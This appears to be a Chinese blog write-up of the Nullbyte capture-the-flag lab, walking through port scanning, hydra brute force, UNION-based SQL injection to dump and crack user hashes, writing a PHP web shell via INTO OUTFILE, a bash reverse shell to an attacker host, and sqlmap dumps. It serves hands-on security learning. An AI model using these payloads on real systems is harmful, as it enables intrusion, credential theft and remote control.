首页 > 数据库 >Nullbyte - SQL注入大赏

Nullbyte - SQL注入大赏

时间:2023-05-08 12:00:10浏览次数:51  
标签:Nullbyte -- union xx SQL 大赏 table select schema

主机发现

sudo nmap -sT --min-rate 10000 -p- xx.xx.xx.xx -oA nmapscan/ports

sudo nmap -sT -sC -sV -O -p xx.xx.xx.xx -oA nmapscan/detail

sudo nmap -sU --top-ports 20 xx.xx.xx.xx -oA nmapscan/udp

sudo nmap -sU -p xx.xx.xx.xx 

sudo nmap --script=vuln -p xx.xx.xx.xx -oA nmapscan/vuln

网页渗透

尝试爆破目录

sudo gobuster -u http://xx.xx.xx.xx/ -w 

查看源代码发现了有一张图片main.gif 

wget下载图片http://xx.xx.xx.xx/main.gif 

查看图片是否有隐写信息

file main.gif 

exiftools main.gif

comment目录中发现有不一样的字符,可能是密码

但是这里怎么都没想到的是!!!这个竟然是网页的地址

拼接上目标机ip

http://xx.xx.xx.xx/KzMb5nVYJw进入到新的页面

 查看源代码

 他说密码不复杂通过hydra或者bp进行暴力破解

hydra xx.xx.xx.xx http-form-post "/KzMb5nVYJw/index.php:key=^PASS^:invalid key" -l  xx(此时爆破并不需要用户名,所以随便指定一个就可以) -P /usr/share/wordlists/rockyou.txt

爆破出xx /elite

进入到一个sql页面

 sql注入尝试

1.数据库猜解

通过构造不同的符号尝试报错

' -- -

)&+ -- -

" --> 报错

 猜有多少列

" union select 1,2,3;-- -  #直到能正常出现数据为止

查看数据库以及版本

" union select database(),@@version,user(); -- - #打三个横杠的时候需要证明--空格 为了突出空格

 指定seth读出字段

读出表

" union select database(),@@version,user(); -- -

" union select table_schema,table_name,3 from information_schema.tables;-- - #读出information_schema表中的tables这张表的table_schema和tablename 

会列出这个数据库内的所有数据库和数据库分别由什么表

mysql数据库存在的表

 phpmyadmin存在的表

或者重新构造一个表

" union select table_name,2,3 from information_schema where table_schema="seth"; -- -

 seth库存在的表

爆列名

" union select columus_name,2,3 from information_schema.columus where table_schema="seth" and table_name="users";-- -

爆字段

" union select user,pass from users;-- -

 发现一段base64编码,将其base64 -d解码后发现一段hash

利用hash-identifier进行辨明是md5

将md5保存到一个文件上

 利用hashcat或者john进行破解

john --format=raw-md5 --wordlists=/usr/share/wordlists/rockyou.txt hash_md5

 成功的出密码是omega再ssh登录

2.利用mysql写小马

" union select "<?php system($_GET['xx']);?>",2,3 into outfile "/var/www/html'/uploads/shell/php";-- -

报错

因为2,3不能写到文件中改成

" union select "<?php system($_GET['xx']);?>","",""  into outfile "/var/www/html'/uploads/shell/php";-- -

因为在我们提交页面的源代码里面将数据上传到的页面为420search.php,所以里面可能存在有数据库的配置文件

3.利用mysql写大马

" union select "<?php exec(\"bash -c 'bash -i >& /dev/tcp/kali's ip/port 0>&1'\");?>","","" into outfile '/var/www/html/upload

4.sqlmap

sqlmap -u http://xx.xx.xx.xx/xx/420search.php?usrtosearch=a" --dbms mysql --dbs

 sqlmap -u http://xx ..... " --dbms mysql -D seth --tables

sqlmap -u http://xx .... " --dbms mysql -D seth -T users --dump

 

标签:Nullbyte,--,union,xx,SQL,大赏,table,select,schema
From: https://www.cnblogs.com/lisenMiller/p/17381310.html

相关文章

  • 安装MySQL
    下载安装包curlhttps://downloads.mysql.com/archives/get/p/23/file/mysql-8.0.32-el7-x86_64.tar.gz-omysql-8.0.32-el7-x86_64.tar.gz-L解压安装包tar-zxvfmysql-8.0.32-el7-x86_64.tar.gz-C/usr/local/卸载mariadb重命名创建一个data目录用于存......
  • MyBatis SQL 批量更新(代码案例)
    写于2021061821:00北京望京一条记录update一次,性能比较差,容易造成阻塞。基于mybatis批量更新,特此记录。@[toc]1.场景当我们在做更新或者是插入操作时,数据为多对多、一一对应的情况例如:编号。名字。状态1tom02jerry03jeck1代码中循环写入、更新这是大多......
  • MySQL双写缓冲区(Doublewrite Buffer)
    本文已收录至Github,推荐阅读......
  • MySQL中的Join 的算法(NLJ、BNL、BKA)
    本文已收录至Github,推荐阅读......
  • 解决mysql出现docker出现access denied for user root@% to database“xxx”的问题
    使用navicat连接Linux上的数据库时,新建一个库出现异常无法创建accessdeniedforuserroot@%todatabase返回Linux查看mysql状态状态正常,navicat也能正常连接,排除掉应该是权限的问题dockerexec-itd7bcc087dce1bash进入mysql容器 mysql-uroot-p登录账......
  • 工作中,我们经常用到哪些SQL语句呢
     工作中我们基本上每天都要与数据库打交道,数据库的知识点呢也特别多,全部记住呢也是不可能的,也没必要把所有的记住(有些语句命令可能我们一辈子都用不到)。所以呢在工作之余,把工作中经常用到的一些语句整理出来,忘记的时候可以当做字典来查。个人在工作中用Oracle......
  • 安装SQL Server累积版本更新包,提示“Not Clustered or the Cluster service is up and
    1. NotClusteredortheClusterserviceisupandonline  起因是服务器SQLServer之前有开启SQLServerAlwaysOnHighavailabilityfeatureandinstalledFailoverClusteringcomponents。  1.1 DisabletheAlwaysOnHighAvailabilityfeature    ......
  • postgresql数据预热
    test=#select*frompg_available_extensionswherenamelike'%prewarm%'orderbyname;name|default_version|installed_version|comment-------------+-----------------+-------------------+-----------------------sys_pre......
  • shp数据插入sde连接的PostgreSQL库(二)---利用GeoTools读取shp数据并插入到空间数据库
    前言 上一篇介绍了如何利用Maven构建GeoTools,这一节将介绍下一步内容,如何读取shp文件里面的信息并插入到SDE连接的PostgresSQL现有表中。背景 从搭建环境到实现上述功能,大概用了7个工作日,从4月25日开始的,中间有个五一假期。公司的后端都不愿意接这活,只能自己上了。......
  • 特性介绍 | MySQL 测试框架 MTR 系列教程(二):进阶篇 - 内存/线程/代码覆盖率/单元/压力
    作者:卢文双资深数据库内核研发序言:以前对MySQL测试框架MTR的使用,主要集中于SQL正确性验证。近期由于工作需要,深入了解了MTR的方方面面,发现MTR的能力不仅限于此,还支持单元测试、压力测试、代码覆盖率测试、内存错误检测、线程竞争与死锁等功能,因此,本着分享的精神,将其......